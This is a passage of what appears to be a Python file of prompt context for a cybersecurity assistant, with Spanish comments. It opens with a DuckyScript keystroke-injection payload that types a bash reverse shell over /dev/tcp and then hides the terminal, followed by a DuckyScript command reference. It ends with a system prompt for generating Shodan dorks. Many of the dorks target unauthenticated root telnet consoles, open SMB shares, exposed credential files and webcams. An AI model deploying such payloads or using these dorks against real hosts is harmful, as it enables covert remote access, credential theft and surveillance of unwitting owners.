STRING bash -i >& /dev/tcp/127.0.0.1/56342 0>&1 # Reverse shell
ENTER
DELAY 200
STRING clear # Limpiamos
ENTER
DELAY 200
GUI m # Ocultamos la terminal
DELAY 300
GUI m

STRING
The STRING command keystroke injects (types) a series of keystrokes. STRING will automatically interpret uppercase letters by holding the SHIFT modifier key where necessary. The STRING command will also automatically press the SPACE cursor key, however trailing spaces will be omitted.
Copy
STRING The quick brown fox jumps over the lazy dog
STRINGLN
The STRINGLN command, like STRING, will inject a series of keystrokes then terminate with a carriage return (ENTER).
Copy
STRINGLN      _      _      _      USB       _      _      _
STRINGLN   __(.)< __(.)> __(.)=   Rubber   >(.)__ <(.)__ =(.)__
STRINGLN   \___)  \___)  \___)    Ducky!    (___/  (___/  (___/
STRING Blocks
STRING Blocks
STRING blocks can be used effectively to convert multiple lines into one without needing to prepend each line with STRING
STRING blocks strip leading white space and ignore new lines!
Copy
STRING
    a
    b
    c
END_STRING
is the equivalent of 
Copy
STRING a
STRING b
STRING c
Or in this case: STRING abc
 STRINGLN Blocks
STRINGLN blocks can be used like here-doc; allowing you to inject multiple lines as they are written in the payload. 
STRINGLN blocks strip the first tab but will preserve all other formatting
Copy
STRINGLN
    a
    b
    c
END_STRINGLN
is the equivalent of
Copy
STRINGLN a
STRINGLN b
STRINGLN c
Result
Deploying this payload will produce the following keystroke injection on the target machine:
Copy
a
b
c
Cursor Keys
The cursor keys are used to navigate the cursor to a different position on the screen.
UP DOWN LEFT RIGHT
UPARROW DOWNARROW LEFTARROW RIGHTARROW
PAGEUP PAGEDOWN HOME END
INSERT DELETE DEL BACKSPACE
TAB
SPACE
System Keys 
System keys are primarily used by the operating system for special functions and may be used to interact with both text areas and navigating the user interface.
ENTER
ESCAPE
PAUSE BREAK
PRINTSCREEN
MENU APP
F1 F2 F3 F4 F5 F6 F7 F8 F9 F0 F11 F12
Basic Modifier Keys
Modifier keys held in combination with another key to perform a special function. Common keyboard combinations for the PC include the familiar CTRL c for copy, CTRL x for cut, and CTRL v for paste. 
SHIFT
ALT
CONTROL or CTRL
COMMAND
WINDOWS or GUI
Copy
REM Windows Modifier Key Example

REM Open the RUN Dialog
GUI r

REM Close the window
ALT F4
Key and Modifier Combos
In addition to the basic modifier key combinations, such as CTRL c, modifiers and keys may be combined arbitrarily.
CTRL SHIFT
ALT SHIFT
COMMAND CTRL
COMMAND CTRL SHIFT
COMMAND OPTION
COMMAND OPTION SHIFT
CONTROL ALT DELETE
Copy
CTRL ALT DELETE
Standalone Modifier Keys
Injecting a modifier key alone without another key — such as pressing the WINDOWS key — may be achieved by prepending the modifier key with the INJECT_MOD command.
Copy
REM Example pressing Windows key alone

INJECT_MOD WINDOWS
Lock Keys
Lock keys toggle the lock state (on or off) and typically change the interpretation of subsequent keypresses. For example, caps lock generally makes all subsequent letter keys appear in uppercase.
CAPSLOCK
NUMLOCK
SCROLLOCK


"""
Shodan_Context_Beta = """
Eres un asistente de ciberseguridad cuya unica función es procesar la petición del usuario para generar una dork de shodan lo mas exacta posible
Aquí unas dorks de ejemplo 
        city:
Find devices in a particular city. city:"Bangalore"
country:
Find devices in a particular country. country:"IN"
geo:
Find devices by giving geographical coordinates. geo:"56.913055,118.250862"
Location
country:us country:ru country:de city:chicago

hostname:

Find devices matching the hostname. server: "gws" hostname:"google" hostname:example.com -hostname:subdomain.example.com hostname:example.com,example.org

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16

Organization

org:microsoft org:"United States Department"

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true

ssl.cert.subject.cn:example.com

Device Type

device:firewall device:router device:wap device:webcam device:media device:"broadband router" device:pbx device:printer device:switch device:storage device:specialized device:phone device:"voip" device:"voip phone" device:"voip adaptor" device:"load balancer" device:"print server" device:terminal device:remote device:telecom device:power device:proxy device:pda device:bridge

Operating System

os:"windows 7" os:"windows server 2012" os:"linux 3.x"

Product

product:apache product:nginx product:android product:chromecast

Customer Premises Equipment (CPE)

cpe:apple cpe:microsoft cpe:nginx cpe:cisco

Server

server: nginx server: apache server: microsoft server: cisco-ios

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Web

Pulse Secure


Metasploit

ssl:"MetasploitSelfSignedCA"

Network Infrastructure

Hacked routers:

Routers which got compromised hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway. title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

DNS Servers with recursion

"port: 53" Recursion: Enabled

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access. port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 ”Active Management Technology”

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter’s admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Etherium Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24

        
"""